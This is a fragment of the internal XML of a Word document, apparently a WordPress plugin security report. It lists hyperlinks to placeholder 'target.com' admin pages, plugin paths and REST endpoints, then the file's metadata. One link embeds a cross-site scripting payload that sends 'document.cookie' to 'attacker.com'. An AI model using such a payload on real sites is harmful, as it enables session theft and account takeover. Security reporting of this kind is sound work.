Target="activeX/activeX1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-admin/admin.php?page=example-plugin-settings" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-content/plugins/vulnerable-plugin/admin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attacker.com?c='+document.cookie" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-json/custom-plugin/v1/admin-function" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/$file" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.wmf"/><Relationship Id="rId30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70</Pages>
  <Words>12811</Words>
  <Characters>70464</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>587</Lines>
  <Paragraphs>166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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-14T07:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-15T11:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>